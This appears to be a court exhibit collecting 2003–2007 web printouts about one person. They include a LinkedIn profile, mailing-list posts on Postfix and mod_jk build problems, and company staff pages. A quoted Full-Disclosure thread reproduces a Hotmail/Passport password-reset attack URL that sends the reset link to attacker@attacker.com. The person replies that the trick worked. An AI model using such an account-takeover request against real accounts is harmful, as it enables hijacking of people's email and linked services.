# EXHIBIT 20

Dockets.Justia.com



# Wayne Chang

Startup starter
Greater Boston Area

| | |
|---|---|
| **Current** | **• Founder at SCMC Financial**<br>**• Founder at SpyTix**<br>**• Director of Business Development at Pacific**<br>**Northwest Software** |
| **Past** | • Founder at I2hub<br>• Founder at Dorm2Dorm<br>• Security Consultant at AllAdvantage<br>• Administrator at Napster<br>• Founder at Scene Review News Network |
| **Education** | University of Massachusetts at Amherst |
| **Recommended** | 7 people have recommended Wayne<br>1 manager, 2 reports, 4 co-workers |
| **Connections** | 138 connections |
| **Industry** | Internet |
| **Public Profile** | http://www.linkedin.com/in/waynechang |

## Summary

I enjoy starting up businesses, especially ones that shake things up.

Specialties:
Strong leadership skills, project management, business strategy, entrepreneur mentality

---

### How you're connected to Wayne

**You**

Joshua Walker

Wayne's connections

**Wayne Chang**

---

### Wayne Recommends

**People (5)**

**Mike Hayner**
Chief Technical Officer, Pacific Northwest Software

Mike is a technological genius. He's the tech...

**John Taves**
Partner, Pacific Northwest Software

John is extremely smart, knowledgeable,...

**Rob Lemos**
Senior writer, CNET News.com
Rob is a great writer and passionate about this...

# Experience

**Founder**
**SCMC Financial**
(Privately Held: Investment Management industry)
February 2006 – Present (1 year 5 months)

**Founder**
**SpyTix**
(Privately Held: Computer Software industry)
February 2006 – Present (1 year 5 months)

**Director of Business Development**
**Pacific Northwest Software**
(Privately Held: 11-50 employees; Computer Software industry)
August 2002 – Present (4 years 11 months)

Wayne has 5 recommendations (1 manager, 1 report, 3 co-workers) including:

Joe Ferris *Lead Developer, Pacific Northwest Software*

Alexandr Novikov *Director of Europe Branch, Pacific Northwest Software*

Mike Hayner *VP of Engineering, Pacific Northwest Software*

Carl Corcoran *Development Lead, Pacific Northwest Software*

Eric Schoonover *Project Manager, Pacific Northwest Software*

**Founder**
**i2hub**
(Privately Held: 51-200 employees; Internet industry)
February 2003 – November 2005 (2 years 10 months)

Wayne has 1 recommendation (1 report) including:

Jeremy Caron *LETE Application Engineer, ALPESA Impact*

### Founder
**Dorm2Dorm**
(Privately Held; 1-10 employees; Internet industry)
September 2003 – February 2004 ( 6 months)

Wayne has 1 recommendation (1 co-worker) including:

Dan Dumont

### Security Consultant
**AllAdvantage**
(Privately Held; 201-500 employees; Marketing and Advertising industry)
November 1999 – December 2000 (1 year 2 months)

### Administrator
**Napster**
(Privately Held; 51-200 employees; Computer Software industry)
August 1999 – September 2000 (1 year 2 months)

### Founder
**Scene Review News Network**
(Privately Held; 1-10 employees; Online Media industry)
February 1998 – August 2000 (2 years 7 months)

## Education

**University of Massachusetts at Amherst**
Computer Science, Business, 2002 – 2005

## Recommendations For Wayne

### Director of Business Development

"Wayne is extremely hard working and knows how to get things done. Working with Wayne has been a real opportunity." *June 29, 2006*

> Joe Ferris *Lead Developer, Pacific Northwest Software*
> *reported to Wayne at Pacific Northwest Software*

"Wayne is an inspiring and energetic colleague who gets things done and whose vision and advice I trust and respect. I am very pleased to know Wayne and very happy to recommend him." *June 29, 2006*

> Alexandr Novikov *Director of Europe Branch, Pacific Northwest Software*
> *worked directly with Wayne at Pacific Northwest Software*

"Wayne is a sheer genious when it comes to marketing. He developed and executed a brilliant marketing campaign that resulted in a huge increase in our leads." *June 27, 2006*

> Mike Hayner *VP of Engineering, Pacific Northwest Software*
> *managed Wayne at Pacific Northwest Software*

"Wayne is driven, decisive, and smart. I can trust his decisions and work to be thought out and practical. Very enjoyable to work with." *June 27, 2006*

> Carl Corcoran *Development Lead, Pacific Northwest Software*
> *worked directly with Wayne at Pacific Northwest Software*

"A very smart and driven individual. Highly recommended. Working with Wayne was a real pleasure." *January 5, 2004*

> Eric Schoonover *Project Manager, Pacific Northwest Software*
> *worked with Wayne at Pacific Northwest Software*

## Founder
### i2hub

"I've worked with Wayne on i2hub.com efforts for almost a year now and I can honestly say that the project would never have seen the light of day without his guidance and vigilance. He has overseen every step of the process, kept us focused and motivated, and worked to develop a strong sense of community that has made the project the success it has become. Thanks for bringing me on board :)" *July 30, 2004*

> Jeremy Caron *J2EE Application Engineer, ADESA Impact*
> *reported to Wayne at i2hub*

**Founder**
**Dorm2Dorm**

"Very motivated and creative individual. A pleasure to work with." *January 13, 2004*

Dan Dumont
worked directly with Wayne at Dorm2Dorm

# Additional Information

Groups and Associations:

Y Combinator

Forbes. Forbes.com Entrepreneurs member

Honors and Awards:

- Guest speaker, Power Users Conference International, EDC, 2005
- One of four featured in "Networth", CBS Sunday Morning News, July 2005

- Technology leader, "Top 15 College Students", Current Magazine, Spring 2005
- Profiled in "e-Files", Boston Globe, Spring 2001

# Contact Settings

Interested In:

- career opportunities
- consulting offers
- new ventures
- job inquiries
- expertise requests
- business deals
- reference requests
- getting back in touch

Location:

Projects taking place in any region, as well as via phone/email.



# Is Lasik Right for Me?

### Schedule Your FREE Evaluation & See!

LO
Call
1-800-

# [Web-cyradm] compiling problem with postfix

**Wayne Chang** wchang at pnwsoft.com
*Mon Jun 9 18:46:17 CEST 2003*

- Previous message: [Web-cyradm] feature request
- Next message: [Web-cyradm] setting up accounts
- **Messages sorted by:** [ date ] [ thread ] [ subject ] [ author ]

---

```
Hi guys,

I'm trying to compile postfix.  The command I used before "make" was:

make makefiles 'CCARGS=-DHAS_MYSQL \
-I/usr/local/mysql/include/mysql -DUSE_SASL_AUTH \
-I/usr/local/include/sasl -I/usr/local/BerkeleyDB.4.1/include' \
'AUXLIBS=-L/usr/local/mysql/lib/mysql \
-lmysqlclient -lz -lm -L/usr/local/lib -lsasl2 -L/usr/local/BerkeleyDB.4.1/l
ib'

The error that I'm getting is:
[src/master]
gcc -Wmissing-prototypes -Wformat -DHAS_MYSQL -I/usr/local/mysql/include/mys
ql -DUSE_SASL_AUTH -I/usr/local/include/sasl -I/usr/local/BerkeleyDB.4.1/inc
lude -g -O -I. -I../../include -DLINUX2 -o master master.o master_conf.o
master_ent.o master_sig.o master_avail.o master_spawn.o master_service.o
master_status.o master_listen.o master_vars.o master_wakeup.o master_flow.o
../../lib/libglobal.a
../../lib/libutil.a -L/usr/local/mysql/lib/mysql -lmysqlclient -lz -lm -L/us
r/local/lib -lsasl2 -L/usr/local/BerkeleyDB.4.1/lib -ldb -lnsl -lresolv
/usr/local/BerkeleyDB.4.1/lib/libdb.so: undefined reference to
`pthread_condattr_setpshared'
/usr/local/BerkeleyDB.4.1/lib/libdb.so: undefined reference to
`pthread_mutexattr_destroy'
/usr/local/BerkeleyDB.4.1/lib/libdb.so: undefined reference to
`pthread_mutexattr_setpshared'
/usr/local/BerkeleyDB.4.1/lib/libdb.so: undefined reference to
`pthread_mutexattr_init'
/usr/local/BerkeleyDB.4.1/lib/libdb.so: undefined reference to
`pthread_mutex_trylock'
collect2: ld returned 1 exit status
make: *** [master] Error 1
make: *** [update] Error 1

Any ideas?  I deviated from the HOWTO a little by not using BerkeleyDB 4.0,
but using 4.1, and not installing in /bdb.
```

Best regards,

Wayne Chang

Pacific Northwest Software

Mobile:     (978) 869-3446

Email:      wchang at pnwsoft.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.web-cyradm.org/pipermail/web-cyradm/attachments/20030609/20594e1b/at

- Previous message: [Web-cyradm] feature request
- Next message: [Web-cyradm] setting up accounts
- **Messages sorted by:** [ date ] [ thread ] [ subject ] [ author ]

More information about the Web-cyradm mailing list

# Mailing list archives

Site index · List index

**Message view**                                      « Date » · « Thread

| | |
|---|---|
| **From** | John Turner <tomcat-u...@johnturner.com> |
| **Subject** | Re: mod_jk questions |
| **Date** | Fri, 13 Jun 2003 17:08:23 GMT |

Well, building it is pretty easy, all things considered.  Is that an option
for you?  I haven't built any of the 1.2.4 releases yet, but I doubt they
are much different than the others.  I can furnish build instructions, as
can others on the list.

Otherwise, you will have to wait for the binary, probably next week.

John

On Sat, 14 Jun 2003 00:18:50 +0900, Wayne Chang <wchang@pnwsoft.com> wrote:

> John,
>
> The platform is Red Hat 9.
>
> Best regards,
>
>
> Wayne Chang
>
> Pacific Northwest Software
>
> Mobile:    (978) 869-3446
>
> Email:      wchang@pnwsoft.com
>
> -----Original Message-----
> From: John Turner [mailto:tomcat-user@johnturner.com]
> Sent: Saturday, June 14, 2003 12:01 AM
> To: Tomcat Users List
> Subject: Re: mod_jk questions
>
>
> Platform?
>
> John
>
> On Fri, 13 Jun 2003 23:47:47 +0900, Wayne Chang <wchang@pnwsoft.com>
> wrote:
>
>> Hi,
>>
>> I noticed that the mod_jk 1.2.4 was recently released.  I was wondering
>> if
>> you had a binary of it available for Apache 1.3 and Tomcat 4.1.  I would

```
>> like to upgrade my mod_jk.  On a related note, I was hoping you could
>> shed
>> some light on some trouble I've been having.  Sometimes the website
>> doesn't
>> respond to jsp requests, but loading html files is okay.  I think it's a
>> mod_jk problem which is why I would like to upgrade it.
>>
>> Any input at all would be much appreciated, thank you for your time,
>>
>> Best regards,
>>
>>
>> Wayne Chang
>>
>> Pacific Northwest Software
>>
>> Mobile:     (978) 869-3446
>>
>> Email:      wchang@pnwsoft.com
>>
>>
>
>
>
> --
> Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/
>
> ----------------------------------------------------------------
> To unsubscribe, e-mail: tomcat-user-unsubscribe@jakarta.apache.org
> For additional commands, e-mail: tomcat-user-help@jakarta.apache.org



--
Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/

----------------------------------------------------------------
To unsubscribe, e-mail: tomcat-user-unsubscribe@jakarta.apache.org
For additional commands, e-mail: tomcat-user-help@jakarta.apache.org
```

**Mime**    • Unnamed text/plain (inline, None, 2443 bytes)

View raw message

**Top**                                                    « **Date** » · « **Thread**



# ARCHIVES



Neohapsis is currently accepting applications for employment. For more information,
please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Full-Disclosure> 2003-q2

---

## Re: [Full-Disclosure] U.S. military helps fund Calgary hacker with $2.3 million

**From:** Wayne Chang (*WChang@pickatime.com*)
**Date:** Mon Apr 07 2003 - 15:21:13 CDT

- **Messages sorted by:** [ date ] [ thread ] [ subject ] [ author ]

---

"Only one remote hole in the default install, in more than 7 years!"

I take it that it means there has been only one remote hole in the default
install a one 7-year stretch, whether that includes this year or not, it
doesn't say.

1990-1997 is a 7-year stretch.
1991-1998 is a 7-year stretch.

By default install, it means the default install of any openbsd in that
7-year stretch, not specific on one.

It's pretty tricky that the marketting strategists over there wrote up that
sentence, but if it sells one more license, then so be it.

Wayne Chang
Pacific Northwest Software
----- Original Message -----
From: "Pekka Savola" <pekkas@netcore.fi>
To: "Blue Boar" <BlueBoar@thievco.com>
Cc: <guninski@guninski.com>; <full-disclosure@lists.netsys.com>
Sent: Monday, April 07, 2003 3:37 PM
Subject: Re: [Full-Disclosure] U.S. military helps fund Calgary hacker with
$2.3 million

> On Mon, 7 Apr 2003, Blue Boar wrote:
> > I'd be willing to give Theo the benefit of the doubt
> > that the author misunderstood the "Only one remote hole in the default
> > install, in more than 7 years!" claim of the OpenBSD team. Unless you
> > think that claim is also untrue.
> >
> That claim is certainly untrue.
>

> If you take a default install from 7 years back, you certainly have more
> remote holes, in services that have since been removed from the default
> install -- looking 7 years back from *current* default install, not
> default install *7 years back*.
>
> --
> Pekka Savola "You each name yourselves king, yet the
> Netcore Oy kingdom bleeds."
> Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings
>
> _____
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

- **Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]**

Portions of this site ©1998-2007. Neohapsis. Inc. Questions, comments or feedback welcomed.    webmaster@neohapsis.com

**White Badger Group, Inc.**
Vulnerability Scanning, Penetration
Testing, Consulting, and Education
www.whitebadger.com

**Endpoint Protection 11.0**
Symantec is raising the bar for
enterprise security. See more now!
www.symantec.com/endpoint

**Is Your Perimeter Secure?**
Network and App Security Testing
Clear and Actionable Deliverables
www.depthsecurity.com

**Information Risk Mgm**
Optimize your risk mana
spend Your security inte
www.ksr.com

Ads t

**security.full-disclosure**
[Top] [All Lists]

<prev [**Date**] next>

[Advanced]

Search

<prev [**Thread**] next>

# Re: Hotmail & Passport (.NET Accounts) Vulnerability

**Subject:** Re: Hotmail & Passport (.NET Accounts) Vulnerability

**List-id:** Discussion of security issues <full-disclosure.lists.netsys.com>

```
I just tried this (with permission from the email owners).  It worked on all
occasions.

Wayne Chang
Pacific Northwest Software
----- Original Message -----
From: "Christopher F. Herot" <cherot@appliedmessaging.com>
To: <mfrd@attitudex.com>; <full-disclosure@lists.netsys.com>
Sent: Thursday, May 08, 2003 12:05 AM
Subject: RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts)
Vulnerability


>
> I just tried this.  It does indeed generate the "reset password" email
> and link, which is scary, but following the instructions does not really
> reset the password, at least not for the limited test I performed.
>
>
> > -----Original Message-----
> > From: Muhammad Faisal Rauf Danka [mailto:mfrd@attitudex.com]
> > Sent: Wednesday, May 07, 2003 10:51 PM
> > To: full-disclosure@lists.netsys.com
> >
> > Hotmail & Passport (.NET Accounts) Vulnerability
> >
> > There is a very serious and stupid vulnerability or badcoding in
> Hotmail / Passport's (.NET
> > Accounts)
> >
> > I tried sending emails several times to Hotmail / Passport contact
> addresses, but always met with
> > the NLP bots.
> >
> > I guess I don't need to go in details of how cruical and important
> Hotmail / Passport's .NET
> > Account passport is to anyone.
> >
> > You name it and they have it, E-Commerce, Credit Card processing,
> Personal Emails, Privacy Issues,
```

```
> > Corporate Espionage, maybe stalkers and what not.
> >
> > It is so simple that it is funny.
> >
> > All you got to do is hit the following in your browser:
> >
> >
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmai
> l.com&id=&cb=&prefem=attac
> > ker@attacker.com&rst=1
> >
> > And you'll get an email on attacker@attacker.com asking you to click
> on a url something like this:
> >
> >
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLN
> um=0&lc=1033
> >
> > From that url, you can reset the password and I don't think I need to
> say anything more about it.
> >
> > Vulnerability / Flaw discovered : 12th April 2003
> > Vendor / Owner notified : Yes (as far as emailing
> them more than 10 times is concerned)
> >
> >
> > Regards
> > --------
> > Muhammad Faisal Rauf Danka
>
> _____
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_____
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
```

**Security Applications**
Deliver Two-Factor Authentication
Solution That Uses 1-Time
Passwords
www.CRYPTOCard.com

**Spyware Appliances**
Proactive Spyware Protection, Free
Whitepapers, Guaranteed to Work.
www.finjan.com

**Professional IT Services**
Consult, design, build, integrate,
maintain & support -
703.361.4606
www.v2systems.com

**Become PCI Complian**
Address PCI, SarbOX, HI
Compliance Whitepaper
www.nitrosecurity.com

Ada t

[More with this subject...]

**<Prev in Thread]**          **Current Thread**          **[Next in Thread>**

- **Re: Hotmail & Passport (.NET Accounts)**, *(continued)*
  - **Re: Hotmail & Passport (.NET Accounts)**, *Georgi Guninski*
  - **Re: Hotmail & Passport (.NET Accounts)**, *Nick FitzGerald*
  - **Re: Hotmail & Passport (.NET Accounts)**, *Mark J Cox*
  - **RE: Hotmail & Passport (.NET Accounts)**, *Ed Carp*
  - **Re: Hotmail & Passport (.NET Accounts) Vulnerability**, *Wayne Chang \(Pacific Northwest Software\)*

- ○ **PowerLinkâ WAN Aggregator - Vunerability**, *morning_wood*
- ○ **RE: Hotmail & Passport (.NET Accounts) Vulnerability**, *Christopher F. Herot*
  - ■ **RE: Hotmail & Passport (.NET Accounts) Vulnerability**, *Marc Slemko*
    - ■ **Re: Hotmail & Passport (.NET Accounts) Vulnerability**, *Byrne Ghavalas*
  - ■ **Re: Hotmail & Passport (.NET Accounts) Vulnerability**, *Suryanto*
  - ■ **Re: Hotmail & Passport (.NET Accounts) Vulnerability**, *Wayne Chang \(Pacific Northwest Software\) <=*

**Previous by Date:** **Re: Hotmail & Passport (.NET Accounts) Vulnerability**, *Michael J McCafferty*

**Next by Date:** **Multiple Vulnerabilities found in Microsoft .Net Passport Services**, *Qazi Ahmed*

**Previous by Thread:** **Re: Hotmail & Passport (.NET Accounts) Vulnerability**, *Suryanto*

**Next by Thread:** **Re: Hotmail & Passport (.NET Accounts) Vulnerability**, *dong-h0un U*

**Indexes:** [**Date**] [**Thread**] [**Top**] [**All Lists**]

# Mailing list archives

Site index · List index

**Message view**                                    « Date » · « Thread ›

|        |                                           |
|--------|-------------------------------------------|
| **From** | "Wayne Chang" <wch...@pnwsoft.com> |
| **Subject** | RE: mod_jk questions |
| **Date** | Sat, 14 Jun 2003 00:37:49 GMT |

John,

I could wait until next week.  What do you think about the fact that jsp
refuses to load but html files load fine?  This happens once in awhile.  Is
it the max number of connections were made?  Or is mod_jk/tomcat puking?
What would be a way of remedying this?

Best regards,

Wayne Chang
Pacific Northwest Software
Mobile:     (978) 869-3446
Email:      wchang@pnwsoft.com


-----Original Message-----
From: John Turner [mailto:tomcat-user@johnturner.com]
Sent: Saturday, June 14, 2003 2:08 AM
To: Tomcat Users List
Subject: Re: mod_jk questions


Well, building it is pretty easy, all things considered.  Is that an option
for you?  I haven't built any of the 1.2.4 releases yet, but I doubt they
are much different than the others.  I can furnish build instructions, as
can others on the list.

Otherwise, you will have to wait for the binary, probably next week.

John

On Sat, 14 Jun 2003 00:18:50 +0900, Wayne Chang <wchang@pnwsoft.com> wrote:

> John,
>
> The platform is Red Hat 9.
>
> Best regards,
>
>
> Wayne Chang
>
> Pacific Northwest Software
>
> Mobile:     (978) 869-3446

```
>
> Email:        wchang@pnwsoft.com
>
> -----Original Message-----
> From: John Turner [mailto:tomcat-user@johnturner.com]
> Sent: Saturday, June 14, 2003 12:01 AM
> To: Tomcat Users List
> Subject: Re: mod_jk questions
>
>
>
> Platform?
>
> John
>
> On Fri, 13 Jun 2003 23:47:47 +0900, Wayne Chang <wchang@pnwsoft.com>
> wrote:
>
>> Hi,
>>
>> I noticed that the mod_jk 1.2.4 was recently released.  I was wondering
>> if
>> you had a binary of it available for Apache 1.3 and Tomcat 4.1.  I would
>> like to upgrade my mod_jk.  On a related note, I was hoping you could
>> shed
>> some light on some trouble I've been having.  Sometimes the website
>> doesn't
>> respond to jsp requests, but loading html files is okay.  I think it's a
>> mod_jk problem which is why I would like to upgrade it.
>>
>> Any input at all would be much appreciated, thank you for your time,
>>
>> Best regards,
>>
>>
>> Wayne Chang
>>
>> Pacific Northwest Software
>>
>> Mobile:     (978) 869-3446
>>
>> Email:        wchang@pnwsoft.com
>>
>>
>
>
>
> --
> Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/
>
> ------------------------------------------------------------------
> To unsubscribe, e-mail: tomcat-user-unsubscribe@jakarta.apache.org
> For additional commands, e-mail: tomcat-user-help@jakarta.apache.org


--
Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/

------------------------------------------------------------------
To unsubscribe, e-mail: tomcat-user-unsubscribe@jakarta.apache.org
```

```
To unsubscribe, e-mail: tomcat-user-unsubscribe@jakarta.apache.org
For additional commands, e-mail: tomcat-user-help@jakarta.apache.org


----------------------------------------------------------------
To unsubscribe, e-mail: tomcat-user-unsubscribe@jakarta.apache.org
For additional commands, e-mail: tomcat-user-help@jakarta.apache.org
```

**Mime**      • Unnamed text/plain (inline, 7-Bit, 3203 bytes)
          View raw message

**Top**                                               « **Date** » · « **Thread** ›

 **ARCHIVES**           NEOHAPSIS

Neohapsis is currently accepting applications for employment. For more information,
please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Full-Disclosure> 2003-q2

## Re: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability

**From:** Wayne Chang (Pacific Northwest Software) (*WChang@pnwsoft.com*)
**Date:** Thu May 08 2003 - 00:32:10 CDT

- **Messages sorted by:** [ date ] [ thread ] [ subject ] [ author ]

I just tried this (with permission from the email owners). It worked on all
occasions.

Wayne Chang
Pacific Northwest Software
----- Original Message -----
From: "Christopher F. Herot" <cherot@appliedmessaging.com>

To: <mfrd@attitudex.com>; <full-disclosure@lists.netsys.com>

Sent: Thursday, May 08, 2003 12:05 AM
Subject: RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts)
Vulnerability

>
> I just tried this. It does indeed generate the "reset password" email
> and link, which is scary, but following the instructions does not really
> reset the password, at least not for the limited test I performed.
>
>
> > -----Original Message-----
> > From: Muhammad Faisal Rauf Danka [mailto:mfrd@attitudex.com]
> > Sent: Wednesday, May 07, 2003 10:51 PM
> > To: full-disclosure@lists.netsys.com
> >
> > Hotmail & Passport (.NET Accounts) Vulnerability
> >
> > There is a very serious and stupid vulnerability or badcoding in
> Hotmail / Passport's (.NET
> > Accounts)
> >
> > I tried sending emails several times to Hotmail / Passport contact
> addresses, but always met with
> > the NLP bots.
> >
> > I guess I don't need to go in details of how cruical and important

http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0600.html          6/15/2007

> Hotmail / Passport's .NET
> > Account passport is to anyone.
> >
> > You name it and they have it, E-Commerce, Credit Card processing,
> Personal Emails, Privacy Issues,
> > Corporate Espionage, maybe stalkers and what not.
> >
> > It is so simple that it is funny.
> >
> > All you got to do is hit the following in your browser:
> >
> >
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmai
> l.com&id=&cb=&prefem=attac
> > ker@attacker.com&rst=1
> >
> > And you'll get an email on attacker@attacker.com asking you to click
> on a url something like this:
> >
> >
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLN
> um=0&lc=1033
> >
> > From that url, you can reset the password and I don't think I need to
> say anything more about it.
> >
> > Vulnerability / Flaw discovered : 12th April 2003
> > Vendor / Owner notified : Yes (as far as emailing
> them more than 10 times is concerned)
> >
> >
> > Regards
> > --------
> > Muhammad Faisal Rauf Danka
>
> _____
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_____
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

- **Messages sorted by:** [ date ] [ thread ] [ subject ] [ author ]

Portions of this site ©1998-2007, Neohapsis, Inc. Questions, comments or feedback welcomed.    webmaster@neohapsis.co

Pacific Northwest Software

1514 223rd Place
Sammamish, WA 98074
425 868-1395

Home
**Our Mission**
**What We Do**
**Who We Are**
**Contact Us**

**John Taves, President and Senior Engineer**

John Taves started Pacific Northwest Software in 1998 with the objective of providing superior software contract programming.

John has over 16 years of technical computer experience. He is also an expert in OCR Algorithms, having developed machine print algorithms used currently on the bulk of the mail processed by the United States Post Office.

See John's resume for more details.

**Mike Hayner, Corporate Officer and Director of Software Development**

Mike Hayner has over 10 years of technical computer experience.

Mike Hayner is an experienced software development manager and an expert in web and database design. He has managed the development of several internal and external sites for Microsoft that utilize SharePoint Portal Server 2003, SharePoint Team Services, ASP.NET, C# Web Parts, SQL Server databases, ActiveX controls, and ISAPI filters and extensions.

See Mike's resume.

**LiWen Liang, Senior Software Engineer**

LiWen Liang has more than 10 years of professional experience, including 5 years as a technical lead, mentoring junior team members.

She has been working with different size of companies developing both their intranets and external web sites. She has solid technical background, which includes skills in ASP.NET, SQL Server Database, SharePoint Portal Server 2003, C# Web Parts, ASP, PHP, mySQL, Java.

Pacific Northwest Software

### Alex Novikov, Senior Software Engineer

Alex has more than 9 years of professional experience, and has lead development teams.

He has extensive experience with Java and ASP.NET as well strong skills in C/C++, SQL, and other programming languages.

### David Rivard, Senior Software Engineer

David has 7 years of development experience after obtaining a Bachelors degree in Computer Science.? He is an expert in C++, C#, SQL Server, and .NET technologies.?? David is an expert in web application development from ISAPI applications, ASP, ASP.Net, and SharePoint.? He also has years of experience developing large enterprise applications focused on manageability and security.

### Eric Schoonover, Software Engineer

Eric Schoonover is developer with 3 years of experience, including both web and C# development.

### Alexy Shurkopat, Software Engineer

Alexy has more than 5 years of experience and is an expert on Java and SQL.

### Thompson Hayner, Database Administrator

Thompson has 11 years of experience in database design and development, database administration, and IT security (including HIPAA).? He has worked in a variety of industries (financial, tax planning, high-tech, and manufacturing).

### Kelly Frasure, Quality Assurance Engineer

Kelly's experience of 3 years consists of software testing, developing and executing test plans, developing and executing test cases, analyzing the results of test plans and test cases, and determining when bugs have been fixed satisfactorily. She also has experience programming in Visual Basic, Java, Perl. She has web development experience using HTML, PHP, ASP, Perl CGI, JavaScript. She has developed databases using SQLServer, Access, Oracle, PostGreSQL.

### Wayne Chang, System Administrator

Pacific Northwest Software

Page 3 of 3

Wayne sets up and manages the computers that PNWSoft uses including a mix of Windows and Linux servers. He also manages and configures the software that those systems run.

**Ed Winkle, Writer and Editor**

Ed Winkle writes the manuals and other documentation that PNWSoft provides. He also is an excellent content editor for the online information on the projects that we work on.

© Copyright 2003 Pacific Northwest Software, All Rights Reserved.

Pacific Northwest Software

# Pacific Northwest Software

*Developed for Business* [12]

1514 223rd Place NE
Sammamish, WA 98074
425 868-1395

Home
**How We Operate**
**Sample Projects**
**Products**
Who We Are
**Press Releases**
**FAQ**
**Contact Us**



Pacific Northwest
Software -
Developed for
Business

# Who We Are

John Taves, President and Senior Engineer

John Taves started Pacific Northwest Software in 1998 with the objective of providing superior software contract programming.

John has over 16 years of technical computer experience. He is also an expert in OCR Algorithms, having developed machine print algorithms used currently on the bulk of the mail processed by the United States Post Office.

See John's resume for more details.

Mike Hayner, Corporate Officer and Director of Software Development

Mike Hayner has over 11 years of technical computer experience.

Mike Hayner is an experienced software development manager and an expert in web and database design. He has managed the development of several internal and external sites for Microsoft that utilize SharePoint Portal Server 2003, SharePoint Team Services, ASP.NET, C# Web Parts, SQL Server databases, ActiveX controls, and ISAPI filters and extensions.

See Mike's resume.

LiWen Liang, Senior Software Engineer

LiWen Liang has more than 10 years of professional experience, including 5 years as a technical lead, mentoring junior team members.

She has been working with different size of companies developing both their intranets and external web sites. She has solid technical background, which includes skills in ASP.NET, SQL Server Database, SharePoint Portal Server 2003, C# Web Parts, ASP, PHP, mySQL, Java.

Pacific Northwest Software

Page 2 of 3

**Alex Novikov, Senior Software Engineer**

Alex has more than 9 years of professional experience, and has lead development teams.

He has extensive experience with Java and ASP.NET as well strong skills in C/C++, SQL, and other programming languages.

**David Rivard, Senior Software Engineer**

David has 7 years of development experience after obtaining a Bachelors degree in Computer Science.? He is an expert in C++, C#, SQL Server, and .NET technologies.?? David is an expert in web application development from ISAPI applications, ASP, ASP.Net, and SharePoint.? He also has years of experience developing large enterprise applications focused on manageability and security.

**Eric Schoonover, Software Engineer**

Eric Schoonover is developer with 3 years of experience, including both web and C# development.

**Alexy Shurkopat, Software Engineer**

Alexy has more than 5 years of experience and is an expert on Java and SQL.

**Thompson Hayner, Database Administrator**

Thompson has 11 years of experience in database design and development, database administration, and IT security (including HIPAA).? He has worked in a variety of industries (financial, tax planning, high-tech, and manufacturing).

**Kelly Frasure, Quality Assurance Engineer**

Kelly's experience of 3 years consists of software testing, developing and executing test plans, developing and executing test cases, analyzing the results of test plans and test cases, and determining when bugs have been fixed satisfactorily. She also has experience programming in Visual Basic, Java, Perl. She has web development experience using HTML, PHP, ASP, Perl CGI, JavaScript. She has developed databases using SQLServer, Access, Oracle, PostGreSQL.

**Wayne Chang, System Administrator**

Wayne sets up and manages the computers that PNWSoft uses including a mix of Windows and Linux servers. He also manages and configures the software that those systems run.

6/17/2007

Pacific Northwest Software

### Ed Winkle, Writer and Editor

Ed Winkle writes the manuals and other documentation that PNWSoft provides. He also is an excellent content editor for the online information on the projects that we work on.

© Copyright 2004 Pacific Northwest Software, All Rights Reserved.



1514 223rd Place NE
Sammamish, WA 98074
425 444-2368

**Home**
**How We Operate**
**Sample Projects**
**Products**
Who We Are
**Press Releases**
**FAQ**
**Contact Us**

Pacific Northwest
Software -
Developed for
Business

# Who We Are

**John Taves, President and Senior Engineer**

John Taves started Pacific Northwest Software in 1998 with the objective of
providing superior software contract programming.

John has over 16 years of technical computer experience. He is also an expert
in OCR Algorithms, having developed machine print algorithms used currently
on the bulk of the mail processed by the United States Post Office.

See John's resume for more details.

**Mike Hayner, Corporate Officer and Director of Software Development**

Mike Hayner has over 11 years of technical computer experience.

Mike Hayner is an experienced software development manager and an expert
in web and database design. He has managed the development of several
internal and external sites for Microsoft that utilize SharePoint Portal Server
2003, SharePoint Team Services, ASP.NET, C# Web Parts, SQL Server
databases, ActiveX controls, and ISAPI filters and extensions.

See Mike's resume.

**LiWen Liang, Senior Software Engineer**

LiWen Liang has more than 10 years of professional experience, including 5
years as a technical lead, mentoring junior team members.

She has been working with different size of companies developing both their
intranets and external web sites. She has solid technical background, which
includes skills in ASP.NET, SQL Server Database, SharePoint Portal Server
2003, C# Web Parts, ASP, PHP, mySQL, Java.

**Alex Novikov, Senior Software Engineer**

Alex has more than 9 years of professional experience, and has lead
development teams.

He has extensive experience with Java and ASP.NET as well strong skills in
C/C++, SQL, and other programming languages.

**David Rivard, Senior Software Engineer**

David has 7 years of development experience after obtaining a Bachelors

degree in Computer Science.  He is an expert in C++, C#, SQL Server, and .NET technologies.   David is an expert in web application development from ISAPI applications, ASP, ASP.Net, and SharePoint.  He also has years of experience developing large enterprise applications focused on manageability and security.

Eric Schoonover, Software Engineer

Eric Schoonover is developer with 3 years of experience, including both web and C# development.

Alexy Shurkopat, Software Engineer

Alexy has more than 5 years of experience and is an expert on Java and SQL.

Thompson Hayner, Database Administrator

Thompson has 11 years of experience in database design and development, database administration, and IT security (including HIPAA).  He has worked in a variety of industries (financial, tax planning, high-tech, and manufacturing).

Kelly Frasure, Quality Assurance Engineer

